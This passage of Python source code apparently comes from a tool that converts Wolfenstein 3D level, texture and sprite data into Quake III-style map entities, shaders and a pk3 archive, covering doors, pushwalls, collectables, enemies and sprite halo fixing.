for direction, displacement in enumerate(DIR_TO_DISPL[:4]):
facing_coords = ((x + displacement[0]), (y + displacement[1]))
facing = tilemap.get(facing_coords)
if facing is None:
shader = 'common/caulk'
else:
if facing[1] == pushwall_entity:
facing_partition = 'floor'
else:
facing_partition = find_partition(facing[0], partition_map, count_sign=1,
cache=self.tile_partition_cache)
if facing_partition == 'wall':
shader = 'common/caulk'
else:
if facing_partition == 'floor':
texture = tile[0] - partition_map['wall'][0]
elif facing_partition in ('door', 'door_elevator', 'door_silver', 'door_gold'):
texture = partition_map['door_hinge'][0] - partition_map['wall'][0]
else:
raise ValueError((tile_coords, facing_partition))
shader = '{}_wall/{}__{}'.format(params.short_name, cfg.TEXTURE_NAMES[texture], (direction & 1))
face_shaders.append(shader)
face_shaders += ['common/caulk'] * 2
if any(shader != 'common/caulk' for shader in face_shaders):
return self.describe_textured_cube(tile_coords, face_shaders, self.unit_offsets)
else:
return ()
def describe_sprite(self, tile_coords):
params = self.params
cfg = self.cfg
entity = self.tilemap[tile_coords][1]
name = cfg.ENTITY_OBJECT_MAP[entity]
lines = []
if name in cfg.SOLID_OBJECT_NAMES:
face_shaders = ['common/clip'] * 6
lines.extend(self.describe_textured_cube(tile_coords, face_shaders, self.unit_offsets))
face_shader = '{}_static/{}'.format(params.short_name, name)
lines.extend(self.describe_textured_sprite(tile_coords, face_shader, self.unit_offsets))
return lines
def describe_collectable(self, tile_coords): # TODO
params = self.params
cfg = self.cfg
entity = self.tilemap[tile_coords][1]
center_x, center_y, center_z = self.center_units(tile_coords, self.unit_offsets, center_z=True)
name = cfg.ENTITY_OBJECT_MAP[entity]
give_name, give_wait = COLLECTABLE_ENTITY_MAP[name]
trigger_begin = [
'{',
'classname trigger_multiple',
'target "collectable_{:.0f}_{:.0f}_pickup"'.format(*tile_coords),
'wait {:f}'.format(give_wait),
]
trigger_end = ['}']
face_shaders = ['common/trigger'] * 6
trigger_brush = self.describe_textured_cube(tile_coords, face_shaders, self.unit_offsets)
speaker_open_entity = [
'{',
'classname target_speaker',
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, center_z),
'targetname "collectable_{:.0f}_{:.0f}_pickup"'.format(*tile_coords),
'noise "sound/{}/{}"'.format(params.short_name, 'adlib/{}'.format(cfg.COLLECTABLE_PICKUP_SOUNDS[name])),
'}',
]
underworld_z = center_z + params.underworld_offset
give_entity = [
'{',
'classname target_give',
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, underworld_z),
'targetname "collectable_{:.0f}_{:.0f}_pickup"'.format(*tile_coords),
'target "collectable_{:.0f}_{:.0f}_give"'.format(*tile_coords),
'}',
]
target_entity = [
'{',
'classname {}'.format(give_name),
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, underworld_z),
'targetname "collectable_{:.0f}_{:.0f}_give"'.format(*tile_coords),
'}'
]
delay_entity = [
'{',
'classname target_delay',
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, center_z),
'targetname "collectable_{:.0f}_{:.0f}_pickup"'.format(*tile_coords),
'target "collectable_{:.0f}_{:.0f}_respawn"'.format(*tile_coords),
'wait {:f}'.format(give_wait),
'}',
]
speaker_close_entity = [ # TODO
'{',
'classname target_speaker',
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, center_z),
'targetname "collectable_{:.0f}_{:.0f}_respawn"'.format(*tile_coords),
'noise "sound/{}/{}"'.format(params.short_name, 'adlib/menu__exit'),
'}',
]
# Door entity
door_begin = [
'{',
'classname func_door',
'targetname "collectable_{:.0f}_{:.0f}_pickup"'.format(*tile_coords),
'angle -2',
'lip 0',
'dmg 0',
'health 0',
'wait {:f}'.format(give_wait),
'speed 32767',
]
door_end = ['}']
# Sprite brush
face_shader = '{}_collectable/{}'.format(params.short_name, name)
door_brush = self.describe_textured_sprite(tile_coords, face_shader, self.unit_offsets)
# Underworld brush
face_shaders = ['common/nodrawnonsolid'] * 6
unit_offsets = list(self.unit_offsets)
unit_offsets[2] += params.underworld_offset
door_underworld_brush = self.describe_textured_cube(tile_coords, face_shaders, unit_offsets)
light = OBJECT_LIGHT_MAP.get(name)
if light:
normalized_height, amount, color = light
origin = (center_x, center_y, (normalized_height * params.tile_units))
light_entity = [
'{',
'classname light',
'origin "{:.0f} {:.0f} {:.0f}"'.format(*origin),
'light "{:d}"'.format(amount),
'color "{:f} {:f} {:f}"'.format(*color),
'}',
]
else:
light_entity = []
return (trigger_begin + trigger_brush + trigger_end +
speaker_open_entity + delay_entity + speaker_close_entity +
give_entity + target_entity + light_entity +
door_begin + door_brush + door_underworld_brush + door_end)
def describe_door(self, tile_coords):
params = self.params
cfg = self.cfg
tile = self.tilemap[tile_coords][0]
_, texture_name, vertical = cfg.DOOR_MAP[tile]
center_x, center_y, center_z = self.center_units(tile_coords, self.unit_offsets, center_z=True)
half = self.params.tile_units / 2
shader_scales = [self.params.shader_scale, self.params.shader_scale]
trigger_begin = [
'{',
'classname trigger_multiple',
'target "door_{:.0f}_{:.0f}_open"'.format(*tile_coords),
'wait {}'.format(params.door_trigger_wait),
]
trigger_end = ['}']
face_shaders = ['common/trigger'] * 6
trigger_brush = self.describe_textured_cube(tile_coords, face_shaders, self.unit_offsets)
speaker_open_entity = [
'{',
'classname target_speaker',
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, center_z),
'targetname "door_{:.0f}_{:.0f}_open"'.format(*tile_coords),
'noise "sound/{}/{}"'.format(params.short_name, 'sampled/door__open'), # FIXME: filename
'}',
]
delay_entity = [
'{',
'classname target_delay',
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, center_z),
'targetname "door_{:.0f}_{:.0f}_open"'.format(*tile_coords),
'target "door_{:.0f}_{:.0f}_close"'.format(*tile_coords),
'wait {}'.format((params.door_trigger_wait + params.door_wait) / 2),
'}',
]
speaker_close_entity = [
'{',
'classname target_speaker',
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, center_z),
'targetname "door_{:.0f}_{:.0f}_close"'.format(*tile_coords),
'noise "sound/{}/{}"'.format(params.short_name, 'sampled/door__close'), # FIXME: filename
'}',
]
# Door entity
door_begin = [
'{',
'classname func_door',
'targetname "door_{:.0f}_{:.0f}_open"'.format(*tile_coords),
'angle {:.0f}'.format(270 if vertical else 0),
'lip 2',
'dmg 0',
'health 0',
'wait {}'.format(params.door_wait),
'speed {}'.format(params.door_speed),
]
door_end = ['}']
# Door brush
face_shader = '{}_wall/{}__{}'.format(params.short_name, texture_name, int(vertical))
if vertical:
extreme_a = ((center_x - 1), (center_y - half), (center_z - half))
extreme_b = ((center_x + 1), (center_y + half), (center_z + half))
face_shaders = [
'common/caulk',
face_shader,
'common/caulk',
face_shader,
'common/caulk',
'common/caulk',
]
else:
extreme_a = ((center_x - half), (center_y - 1), (center_z - half))
extreme_b = ((center_x + half), (center_y + 1), (center_z + half))
face_shaders = [
face_shader,
'common/caulk',
face_shader,
'common/caulk',
'common/caulk',
'common/caulk',
]
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
door_brush = describe_cuboid_brush(face_vertices, face_shaders, shader_scales, flip_directions=(EAST, WEST))
# Underworld brush
face_shaders = ['common/nodrawnonsolid'] * 6
unit_offsets = list(self.unit_offsets)
unit_offsets[2] += params.underworld_offset
door_underworld_brush = self.describe_textured_cube(tile_coords, face_shaders, unit_offsets)
return (trigger_begin + trigger_brush + trigger_end +
speaker_open_entity + delay_entity + speaker_close_entity +
door_begin + door_brush + door_underworld_brush + door_end)
def describe_door_hint(self, tile_coords):
cfg = self.cfg
tile = self.tilemap[tile_coords][0]
vertical = cfg.DOOR_MAP[tile][2]
center_x, center_y, center_z = self.center_units(tile_coords, self.unit_offsets, center_z=True)
half = self.params.tile_units / 2
shader_scales = [self.params.shader_scale, self.params.shader_scale]
face_shaders = ['common/skip'] * 6
if vertical:
extreme_a = ((center_x - 0), (center_y - half), (center_z - half))
extreme_b = ((center_x + 1), (center_y + half), (center_z + half))
face_shaders[WEST] = 'common/hint'
else:
extreme_a = ((center_x - half), (center_y - 0), (center_z - half))
extreme_b = ((center_x + half), (center_y + 1), (center_z + half))
face_shaders[NORTH] = 'common/hint'
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
hint_brush = describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
return hint_brush
def describe_floor_ceiling_clipping(self, thickness=1):
lines = []
face_shaders = ['common/full_clip'] * 6
shader_scales = (1, 1)
dimensions = self.tilemap.dimensions
tile_units = self.params.tile_units
coords_a = self.center_units((-1, dimensions[1]), self.unit_offsets)
coords_b = self.center_units((dimensions[0], -1), self.unit_offsets)
extreme_a = ((coords_a[0] - 0), (coords_a[1] - 0), -thickness)
extreme_b = ((coords_b[0] + 0), (coords_b[1] + 0), 0)
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
lines += describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
extreme_a = ((coords_a[0] - 0), (coords_a[1] - 0), tile_units)
extreme_b = ((coords_b[0] + 0), (coords_b[1] + 0), (tile_units + thickness))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
lines += describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
return lines
def describe_underworld_hollow(self, offset_z=0, thickness=1): # TODO: factorized code for hollows
lines = []
face_shaders = ['common/caulk'] * 6
shader_scales = [self.params.shader_scale, self.params.shader_scale]
dimensions = self.tilemap.dimensions
tile_units = self.params.tile_units
t = thickness
coords_a = self.center_units((-1, dimensions[1]), self.unit_offsets)
coords_b = self.center_units((dimensions[0], -1), self.unit_offsets)
extreme_a = ((coords_a[0] - 0), (coords_a[1] - 0), (offset_z - 0 - tile_units))
extreme_b = ((coords_b[0] + 0), (coords_b[1] + 0), (offset_z + t - tile_units))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
lines += describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
extreme_a = ((coords_a[0] - 0), (coords_a[1] - 0), (offset_z - t + tile_units))
extreme_b = ((coords_b[0] + 0), (coords_b[1] + 0), (offset_z + 0 + tile_units))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
lines += describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
extreme_a = ((coords_a[0] - 0), (coords_a[1] - 0), (offset_z + t - tile_units))
extreme_b = ((coords_a[0] + t), (coords_b[1] + 0), (offset_z - t + tile_units))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
lines += describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
extreme_a = ((coords_b[0] - t), (coords_a[1] - 0), (offset_z + t - tile_units))
extreme_b = ((coords_b[0] + 0), (coords_b[1] + 0), (offset_z - t + tile_units))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
lines += describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
extreme_a = ((coords_a[0] + t), (coords_a[1] - 0), (offset_z + t - tile_units))
extreme_b = ((coords_b[0] - t), (coords_a[1] + t), (offset_z - t + tile_units))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
lines += describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
extreme_a = ((coords_a[0] + t), (coords_b[1] - t), (offset_z + t - tile_units))
extreme_b = ((coords_b[0] - t), (coords_b[1] + 0), (offset_z - t + tile_units))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
lines += describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
return lines
def describe_worldspawn(self):
params = self.params
cfg = self.cfg
dimensions = self.tilemap.dimensions
tilemap = self.tilemap
pushwall_entity = cfg.ENTITY_PARTITION_MAP['pushwall'][0]
music_name = cfg.MUSIC_LABELS[cfg.TILEMAP_MUSIC_INDICES[self.tilemap_index]]
lines = [
'{',
'classname worldspawn',
'music "music/{}/{}"'.format(params.short_name, music_name),
'ambient 100',
'_color "1 1 1"',
'message "{}"'.format(tilemap.name),
'author "{}"'.format(params.author),
]
if params.author2:
lines.append('author2 "{}"'.format(params.author2))
for tile_y in range(dimensions[1]):
for tile_x in range(dimensions[0]):
tile_coords = (tile_x, tile_y)
tile, entity, *_ = tilemap[tile_coords]
if tile:
partition = find_partition(tile, cfg.TILE_PARTITION_MAP, count_sign=1,
cache=self.tile_partition_cache)
lines.append('// {} @ {!r} = tile 0x{:04X}'.format(partition, tile_coords, tile))
if (partition in ('floor', 'door', 'door_silver', 'door_gold', 'door_elevator') or
entity == pushwall_entity):
lines.extend(self.describe_area_brushes(tile_coords))
elif partition == 'wall':
lines.extend(self.describe_wall_brush(tile_coords))
else:
raise ValueError((tile_coords, partition))
if tile in cfg.DOOR_MAP:
lines.append('// {} @ {!r} = door 0x{:04X}, hint'.format(partition, tile_coords, tile))
lines += self.describe_door_hint(tile_coords)
if entity:
partition = find_partition(entity, cfg.ENTITY_PARTITION_MAP, count_sign=-1,
cache=self.entity_partition_cache)
if cfg.ENTITY_OBJECT_MAP.get(entity) in cfg.STATIC_OBJECT_NAMES:
lines.append('// {} @ {!r} = entity 0x{:04X}'.format(partition, tile_coords, entity))
lines += self.describe_sprite(tile_coords)
elif partition == 'enemy':
lines.append('// {} @ {!r} = entity 0x{:04X}'.format(partition, tile_coords, entity))
lines += self.describe_dead_enemy_sprite(tile_coords)
lines.append('// floor and ceiling clipping planes')
lines += self.describe_floor_ceiling_clipping()
lines.append('// underworld hollow')
lines += self.describe_underworld_hollow(params.underworld_offset)
lines.append('} // worldspawn')
return lines
def compute_progression_field(self, player_start_tile_coords):
cfg = self.cfg
tilemap = self.tilemap
dimensions = tilemap.dimensions
wall_start = cfg.TILE_PARTITION_MAP['wall'][0]
wall_endex = wall_start + cfg.TILE_PARTITION_MAP['wall'][1]
pushwall_entity = cfg.ENTITY_PARTITION_MAP['pushwall'][0]
field = {(x, y): 0 for y in range(dimensions[1]) for x in range(dimensions[0])}
visited = {(x, y) : False for y in range(dimensions[1]) for x in range(dimensions[0])}
border_tiles = collections.deque([player_start_tile_coords])
while border_tiles:
tile_coords = border_tiles.popleft()
if not visited[tile_coords]:
visited[tile_coords] = True
field_value = field[tile_coords]
x, y = tile_coords
for direction, displacement in enumerate(DIR_TO_DISPL[:4]):
xd, yd, _ = displacement
facing_coords = (x + xd, y + yd)
facing_tile = tilemap.get(facing_coords)
if facing_tile is not None:
object_name = cfg.ENTITY_OBJECT_MAP.get(facing_tile[1])
if (not visited[facing_coords] and object_name not in cfg.SOLID_OBJECT_NAMES and
(not (wall_start <= facing_tile[0] < wall_endex) or facing_tile[1] == pushwall_entity)):
border_tiles.append(facing_coords)
field_value |= (1 << direction)
field[tile_coords] = field_value
return field
def describe_player_start(self, tile_coords):
tile = self.tilemap[tile_coords]
index = tile[1] - self.cfg.ENTITY_PARTITION_MAP['start'][0]
origin = self.center_units(tile_coords, self.unit_offsets)
origin[2] += 32
player_start = [
'{',
'classname info_player_start',
'origin "{:.0f} {:.0f} {:.0f}"'.format(*origin),
'angle {:.0f}'.format(DIR_TO_YAW[index]),
'}',
]
player_intermission = [
'{',
'classname info_player_intermission',
'origin "{:.0f} {:.0f} {:.0f}"'.format(*origin),
'angle {:.0f}'.format(DIR_TO_YAW[index]),
'}',
]
return player_start + player_intermission
def describe_turn(self, tile_coords, turn_coords):
tilemap = self.tilemap
index = tilemap[tile_coords][1] - self.cfg.ENTITY_PARTITION_MAP['turn'][0]
origin = self.center_units(tile_coords, self.unit_offsets, center_z=True)
step = TURN_TO_DISPL[index]
target_coords = [(tile_coords[0] + step[0]), (tile_coords[1] + step[1])]
lines = []
found = False
while tilemap.check_coords(target_coords):
for coords in turn_coords:
if coords[0] == target_coords[0] and coords[1] == target_coords[1]:
found = True
break
else:
target_coords[0] += step[0]
target_coords[1] += step[1]
if found:
break
else:
raise ValueError('no target turning point for the one at {!r}'.format(tile_coords))
lines += [
'{',
'classname path_corner',
'origin "{:.0f} {:.0f} {:.0f}"'.format(*origin),
'angle {:.0f}'.format(TURN_TO_YAW[index]),
'targetname "corner_{:.0f}_{:.0f}"'.format(*tile_coords),
'target "corner_{:.0f}_{:.0f}"'.format(*target_coords),
'}',
]
return lines
def describe_enemy(self, tile_coords, turn_tiles):
cfg = self.cfg
params = self.params
tilemap = self.tilemap
tile = tilemap.get(tile_coords)
enemy = cfg.ENEMY_MAP.get(tile[1])
if enemy:
direction, level = enemy[1], enemy[3]
if params.enemy_level_min <= level <= params.enemy_level_max and direction < 4:
angle = DIR_TO_YAW[ENEMY_INDEX_TO_DIR[direction]]
origin = self.center_units(tile_coords, self.unit_offsets, center_z=True)
return [
'{',
'classname info_player_deathmatch',
'origin "{:.0f} {:.0f} {:.0f}"'.format(*origin),
'angle {:.0f}'.format(angle),
'}',
]
return ()
def describe_dead_enemy_sprite(self, tile_coords):
cfg = self.cfg
params = self.params
tilemap = self.tilemap
tile = tilemap.get(tile_coords)
enemy = cfg.ENEMY_MAP.get(tile[1])
if enemy:
name = enemy[0] + '__dead'
face_shader = '{}_enemy/{}'.format(params.short_name, name)
return self.describe_textured_sprite(tile_coords, face_shader, self.unit_offsets)
else:
return ()
def describe_object(self, tile_coords):
cfg = self.cfg
params = self.params
tilemap = self.tilemap
tile = tilemap.get(tile_coords)
lines = []
name = cfg.ENTITY_OBJECT_MAP.get(tile[1])
center_x, center_y, center_z = self.center_units(tile_coords, self.unit_offsets, center_z=True)
light = OBJECT_LIGHT_MAP.get(name)
if light:
normalized_height, amount, color = light
origin = (center_x, center_y, (normalized_height * params.tile_units))
lines += [
'{',
'classname light',
'origin "{:.0f} {:.0f} {:.0f}"'.format(*origin),
'light "{:d}"'.format(amount),
'color "{:f} {:f} {:f}"'.format(*color),
'}',
]
lines.append('// TODO')
return lines
def describe_pushwall(self, tile_coords, progression_field):
params = self.params
cfg = self.cfg
tile = self.tilemap[tile_coords]
center_x, center_y, center_z = self.center_units(tile_coords, self.unit_offsets, center_z=True)
field_value = progression_field[tile_coords]
for direction in range(4):
if field_value & (1 << direction):
move_direction = direction
xd, yd = DIR_TO_DISPL[move_direction][:2]
break
else:
raise ValueError('Pushwall @ {!r} cannot be reached or move'.format(tile_coords))
trigger_begin = [
'{',
'classname trigger_multiple',
'target "pushwall_{:.0f}_{:.0f}_move"'.format(*tile_coords),
'wait {}'.format(params.pushwall_trigger_wait),
]
trigger_end = ['}']
face_shaders = ['common/trigger'] * 6
unit_offsets = list(self.unit_offsets)
unit_offsets[0] -= xd
unit_offsets[1] += yd
trigger_brush = self.describe_textured_cube(tile_coords, face_shaders, unit_offsets)
speaker_open_entity = [
'{',
'classname target_speaker',
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, center_z),
'targetname "pushwall_{:.0f}_{:.0f}_move"'.format(*tile_coords),
'noise "sound/{}/{}"'.format(params.short_name, 'sampled/pushwall__move'), # FIXME: filename
'}',
]
# Door entity
door_begin = [
'{',
'classname func_door',
'targetname "pushwall_{:.0f}_{:.0f}_move"'.format(*tile_coords),
'angle {:.0f}'.format(DIR_TO_YAW[move_direction]),
'lip {}'.format(params.tile_units + 2),
'dmg 0',
'health 0',
'wait {}'.format(params.pushwall_wait),
'speed {}'.format(params.pushwall_speed),
# TODO: crusher
]
door_end = ['}']
# Door brush
face_shaders = []
texture = tile[0] - cfg.TILE_PARTITION_MAP['wall'][0]
for direction in range(4):
shader = '{}_wall/{}__{}'.format(params.short_name, cfg.TEXTURE_NAMES[texture], (direction & 1))
face_shaders.append(shader)
face_shaders += ['common/caulk'] * 2
door_brush = self.describe_textured_cube(tile_coords, face_shaders, self.unit_offsets)
# Underworld brush
stop_coords = list(tile_coords)
steps = 0
while progression_field[tuple(stop_coords)] & (1 << move_direction) and steps < 3: # FIXME: magic 3
stop_coords[0] += xd
stop_coords[1] += yd
steps += 1
face_shaders = ['common/nodrawnonsolid'] * 6
unit_offsets = list(self.unit_offsets)
unit_offsets[2] += params.underworld_offset
door_underworld_brush = self.describe_textured_cube(stop_coords, face_shaders, unit_offsets)
return (trigger_begin + trigger_brush + trigger_end + speaker_open_entity +
door_begin + door_brush + door_underworld_brush + door_end)
def describe_entities(self): # TODO
cfg = self.cfg
tilemap = self.tilemap
dimensions = tilemap.dimensions
lines = []
turn_list = []
enemy_list = []
pushwall_list = []
player_start_coords = None
for tile_y in range(dimensions[1]):
for tile_x in range(dimensions[0]):
tile_coords = (tile_x, tile_y)
tile, entity, *_ = tilemap[tile_coords]
if entity:
partition = find_partition(entity, cfg.ENTITY_PARTITION_MAP, count_sign=-1,
cache=self.entity_partition_cache)
description = '// {} @ {!r} = entity 0x{:04X}'.format(partition, tile_coords, entity)
entity_object = cfg.ENTITY_OBJECT_MAP.get(entity)
if partition == 'start':
if player_start_coords is not None:
raise ValueError('There can be only one player start entity')
player_start_coords = tile_coords
lines.append(description)
lines += self.describe_player_start(tile_coords)
elif partition == 'turn':
turn_list.append([description, tile_coords])
elif partition == 'enemy':
enemy_list.append([description, tile_coords])
elif partition == 'pushwall':
pushwall_list.append([description, tile_coords])
elif entity_object in cfg.COLLECTABLE_OBJECT_NAMES:
lines.append(description)
lines += self.describe_collectable(tile_coords)
elif partition == 'object':
lines.append(description)
lines += self.describe_object(tile_coords)
if tile:
partition = find_partition(tile, cfg.TILE_PARTITION_MAP, count_sign=-1,
cache=self.tile_partition_cache)
if tile in cfg.DOOR_MAP:
lines.append('// {} @ {!r} = door 0x{:04X}'.format(partition, tile_coords, tile))
lines += self.describe_door(tile_coords)
progression_field = self.compute_progression_field(player_start_coords)
for description, tile_coords in pushwall_list:
lines.append(description)
lines += self.describe_pushwall(tile_coords, progression_field)
turn_list_entities = [turn[1] for turn in turn_list]
# for description, tile_coords in turn_list:
# lines.append(description)
# lines += self.describe_turn(tile_coords, turn_list_entities)
for description, tile_coords in enemy_list:
lines.append(description)
lines += self.describe_enemy(tile_coords, turn_list_entities)
lines.append('// progression field')
lines += ['// ' + ''.join('{:X}'.format(progression_field[x, y]) for x in range(dimensions[0]))
for y in range(dimensions[1])]
return lines
def describe_tilemap(self):
tilemap = self.tilemap
lines = ['// map #e{}m{}: "{}"'.format(self.episode_index + 1, self.submap_index + 1, tilemap.name)]
lines += self.describe_worldspawn()
lines += self.describe_entities()
return lines
def build_argument_parser():
parser = argparse.ArgumentParser()
group = parser.add_argument_group('input paths')
group.add_argument('--input-folder', default='.')
group.add_argument('--vswap-data', required=True)
group.add_argument('--graphics-data', required=True)
group.add_argument('--graphics-header', required=True)
group.add_argument('--graphics-huffman', required=True)
group.add_argument('--audio-data', required=True)
group.add_argument('--audio-header', required=True)
group.add_argument('--maps-data', required=True)
group.add_argument('--maps-header', required=True)
group.add_argument('--palette') # TODO
group = parser.add_argument_group('output paths')
group.add_argument('--output-folder', default='.')
group.add_argument('--output-pk3', required=True)
group = parser.add_argument_group('settings')
group.add_argument('--cfg', required=True)
group.add_argument('--short-name', default='wolf3d')
group.add_argument('--author', default='(c) id Software')
group.add_argument('--author2')
group.add_argument('--wave-rate', default=22050, type=int)
group.add_argument('--imf-rate', default=700, type=int)
group.add_argument('--imf2wav-path', default=IMF2WAV_PATH)
group.add_argument('--ogg-rate', default=44100, type=int)
group.add_argument('--oggenc2-path', default=OGGENC2_PATH)
group.add_argument('--tile-units', default=96, type=int)
group.add_argument('--alpha-index', default=0xFF, type=int)
group.add_argument('--fix-alpha-halo', action='store_true')
group.add_argument('--texture-scale', default=4, type=int)
group.add_argument('--shader-scale', default=0.375, type=float)
group.add_argument('--door-wait', default=5, type=float)
group.add_argument('--door-speed', default=100, type=float)
group.add_argument('--door-trigger-wait', default=5, type=float)
group.add_argument('--pushwall-wait', default=32767, type=float)
group.add_argument('--pushwall-speed', default=90, type=float)
group.add_argument('--pushwall-trigger-wait', default=32767, type=float)
group.add_argument('--underworld-offset', default=-4096, type=int)
group.add_argument('--enemy-level-min', default=0, type=int)
group.add_argument('--enemy-level-max', default=3, type=int)
return parser
def _sep():
logger = logging.getLogger()
logger.info('-' * 80)
def export_textures(params, cfg, zip_file, vswap_chunks_handler):
logger = logging.getLogger()
logger.info('Exporting textures')
start = 0
count = vswap_chunks_handler.sprites_start - start
texture_manager = pywolf.graphics.TextureManager(vswap_chunks_handler,
cfg.GRAPHICS_PALETTE_MAP[...],
cfg.SPRITE_DIMENSIONS,
start, count)
scaled_size = [side * params.texture_scale for side in cfg.TEXTURE_DIMENSIONS]
for i, texture in enumerate(texture_manager):
name = cfg.TEXTURE_NAMES[i >> 1]
path = 'textures/{}_wall/{}__{}.tga'.format(params.short_name, name, (i & 1))
logger.info('Texture [%d/%d]: %r', (i + 1), count, path)
image = texture.image.transpose(Image.FLIP_TOP_BOTTOM).resize(scaled_size).convert('RGB')
pixels_bgr = bytes(x for pixel in image.getdata() for x in reversed(pixel))
texture_stream = io.BytesIO()
write_targa_bgrx(texture_stream, scaled_size, 24, pixels_bgr)
zip_file.writestr(path, texture_stream.getbuffer())
palette = cfg.GRAPHICS_PALETTE
for i, color in enumerate(palette):
path = 'textures/{}_palette/color_0x{:02x}.tga'.format(params.short_name, i)
logger.info('Texture palette color [%d/%d]: %r, (0x%02X, 0x%02X, 0x%02X)',
(i + 1), len(palette), path, *color)
image = build_color_image(cfg.TEXTURE_DIMENSIONS, color)
image = image.transpose(Image.FLIP_TOP_BOTTOM).convert('RGB')
pixels_bgr = bytes(x for pixel in image.getdata() for x in reversed(pixel))
texture_stream = io.BytesIO()
write_targa_bgrx(texture_stream, cfg.TEXTURE_DIMENSIONS, 24, pixels_bgr)
zip_file.writestr(path, texture_stream.getbuffer())
logger.info('Done')
_sep()
def write_texture_shaders(params, cfg, shader_file, palette_shaders=True):
for name in cfg.TEXTURE_NAMES:
for j in range(2):
shader_name = 'textures/{}_wall/{}__{}'.format(params.short_name, name, j)
path = shader_name + '.tga'
shader_file.write(TEXTURE_SHADER_TEMPLATE.format(shader_name, path))
if palette_shaders:
palette = cfg.GRAPHICS_PALETTE
for i in range(len(palette)):
shader_name = 'textures/{}_palette/color_0x{:02x}'.format(params.short_name, i)
path = shader_name + '.tga'
shader_file.write(TEXTURE_SHADER_TEMPLATE.format(shader_name, path))
def write_static_shaders(params, cfg, shader_file):
for name in cfg.STATIC_OBJECT_NAMES:
shader_name = 'textures/{}_static/{}'.format(params.short_name, name)
path = 'sprites/{}/{}.tga'.format(params.short_name, name)
shader_file.write(SPRITE_SHADER_TEMPLATE.format(shader_name, path))
def write_collectable_shaders(params, cfg, shader_file):
for name in cfg.COLLECTABLE_OBJECT_NAMES:
shader_name = 'textures/{}_collectable/{}'.format(params.short_name, name)
path = 'sprites/{}/{}.tga'.format(params.short_name, name)
shader_file.write(SPRITE_SHADER_TEMPLATE.format(shader_name, path))
def write_enemy_shaders(params, cfg, shader_file):
ignored_names = cfg.STATIC_OBJECT_NAMES + cfg.COLLECTABLE_OBJECT_NAMES
names = [name for name in cfg.SPRITE_NAMES if name not in ignored_names or name.endswith('__dead')]
for name in names:
shader_name = 'textures/{}_enemy/{}'.format(params.short_name, name)
path = 'sprites/{}/{}.tga'.format(params.short_name, name)
shader_file.write(SPRITE_SHADER_TEMPLATE.format(shader_name, path))
def export_shader(params, cfg, zip_file, script_name, shader_writer):
shader_text_stream = io.StringIO()
shader_writer(params, cfg, shader_text_stream)
shader_text = shader_text_stream.getvalue()
zip_file.writestr('scripts/{}'.format(script_name), shader_text.encode())
folder = os.path.join(params.output_folder, 'scripts')
os.makedirs(folder, exist_ok=True)
with open(os.path.join(folder, script_name), 'wt') as shader_file:
shader_file.write(shader_text)
def export_shaders(params, cfg, zip_file):
logger = logging.getLogger()
logger.info('Exporting shaders')
script_writer_map = {
'{}_wall.shader'.format(params.short_name): write_texture_shaders,
'{}_static.shader'.format(params.short_name): write_static_shaders,
'{}_collectable.shader'.format(params.short_name): write_collectable_shaders,
'{}_enemy.shader'.format(params.short_name): write_enemy_shaders,
}
for script_name, shader_writer in script_writer_map.items():
export_shader(params, cfg, zip_file, script_name, shader_writer)
logger.info('Done')
_sep()
def image_to_array(image, shape, dtype=np.uint8):
return np.array(image.getdata(), dtype).reshape(shape)
def array_to_rgbx(arr, size, channels):
assert 3 <= channels <= 4
mode = 'RGBA' if channels == 4 else 'RGB'
arr = arr.reshape(arr.shape[0] * arr.shape[1], arr.shape[2]).astype(np.uint8)
if channels == 4 and len(arr[0]) == 3: # FIXME: make generic, this is only for RGB->RGBA
arr = np.c_[arr, 255 * np.ones((len(arr), 1), np.uint8)]
return Image.frombuffer(mode, size, arr.tostring(), 'raw', mode, 0, 1)
def fix_sprite_halo(rgba_image, alpha_layer):
alpha_layer = image_to_array(alpha_layer, rgba_image.size)
mask_cells = (alpha_layer != 0)
mask = mask_cells.astype(np.uint8)
source = image_to_array(rgba_image, rgba_image.size + (4,))
source *= mask[..., None].repeat(4, axis=2)
accum = np.zeros_like(source, np.uint16)
accum[ :-1, : ] += source[1: , : ]
accum[1: , : ] += source[ :-1, : ]
accum[ : , :-1] += source[ : , 1: ]
accum[ : , 1: ] += source[ : , :-1]
accum[ :-1, :-1] += source[1: , 1: ]
accum[ :-1, 1: ] += source[1: , :-1]
accum[1: , :-1] += source[ :-1, 1: ]
accum[1: , 1: ] += source[ :-1, :-1]
count = np.zeros_like(mask)
count[ :-1, : ] += mask[1: , : ]
count[1: , : ] += mask[ :-1, : ]
count[ : , :-1] += mask[ : , 1: ]
count[ : , 1: ] += mask[ : , :-1]
count[ :-1, :-1] += mask[1: , 1: ]
count[ :-1, 1: ] += mask[1: , :-1]
count[1: , :-1] += mask[ :-1, 1: ]
count[1: , 1: ] += mask[ :-1, :-1]
count_div = np.maximum(np.ones_like(count), count)
count_div = count_div[..., None].repeat(4, axis=2)
accum = (accum // count_div).astype(np.uint8)
accum[..., 3] = 0
accum[mask_cells] = source[mask_cells]
